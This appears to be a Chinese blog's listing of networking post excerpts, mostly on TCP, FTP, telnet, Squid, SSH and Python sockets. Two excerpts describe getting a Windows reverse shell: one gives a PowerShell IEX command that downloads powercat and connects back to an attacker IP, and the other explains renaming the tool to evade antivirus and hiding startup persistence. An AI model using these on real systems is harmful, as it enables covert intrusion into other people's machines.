计算机网络
YZBPXX
这个作者很懒,什么都没留下…
展开
-
windows 已拿到mysql权限最简单的反弹shell方式
大多数人mysql密码是123456 这个时候如果还开放了该端口 可就危险了需要运行的是5.x版本的mysql (一般老师教学都是这个版本)对比网上powercat 脚本多了步把powercat替换成nn命令,这样windows就无法检测出病毒,同时使用vbs 来运行bat也使得用户不易察觉。 注意以下是将病毒植入开机启动程序,需要开机时才能启动服务器需要做的事将脚本上传到客户端可以访问的地方(如启动自带的aphacl,将脚本添加到index.html文件的链接里)服务器启动nc -.原创 2020-12-05 11:14:13 · 676 阅读 · 0 评论 -
TCP连接中为什么不是两次握手
可以模拟打电话(协议好像都可以这样理解)a拨打b电话b接通,然后说“你好”a回答,“你好”,b接收 然后开始通信原创 2020-11-30 10:13:20 · 127 阅读 · 2 评论 -
ftp
ftp概述连个过程:发送命令,使用21端口发送数据,主动模式下服务端是20端口被动模式: 主机去连接服务器(服务器数据端口用PORT命令告诉客户端)主动模式:服务器去连接主机windows 客户端打开被动模式: literal PASV...原创 2020-11-26 11:48:45 · 109 阅读 · 0 评论 -
telnet 验证http和smtp协议
http使用telnet www.baidu.com 80之后会进入一个编辑界面,这个就是也建立的http会话过程,如果按ctr+]则退出了这个会话 去运行telnet命令 ,注意编辑状态下的命令和telnet的命令是两回事之后就可以发送各种请求了 如GET / HTTP/1.1 表示请求根目录下的页面 运行的http是1.1版本smtp说过http后smtp也比较好理解了这里重点介绍测试过程中遇到的问题准备工作,首先如果用qq邮箱测试需要打开imap 服务,打开方法,进入邮箱,然原创 2020-11-21 11:34:38 · 1346 阅读 · 0 评论 -
反弹Windows shell
方法:目标机powershell +攻击机nc攻击机器运行:nc -l 2222目标机:powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 192.168.1.120 -p 2222 -e cmd出现的问题:curl : 未.原创 2020-11-16 16:29:07 · 861 阅读 · 0 评论 -
centos 安装squid代理服务器
参考yum -y install squid // 安装systemctl enable squid.service //设置开机启动在/etc/squid/squid.conf下将cache_dir ufs /var/spool/squid 100 16 256的注释去掉,并且在http_access deny all前添加,############# start ############auth_param basic program /usr/lib64/squid/basic_ncsa转载 2020-09-24 22:08:12 · 147 阅读 · 0 评论 -
ssh 链接与断开服务器命令
链接ssh -q -l root -p 22 111.229.235.155断开logout原创 2019-12-16 15:56:57 · 4026 阅读 · 0 评论 -
python --TCP-UDP 套接字
TCPfrom socket import *serverName = '111.229.235.155'serverPort = 12000ClientSocket = socket(AF_INET,SOCK_STREAM)ClientSocket.connect((serverName,serverPort))print("1:exit")while True: data = ...原创 2019-12-15 16:23:25 · 215 阅读 · 0 评论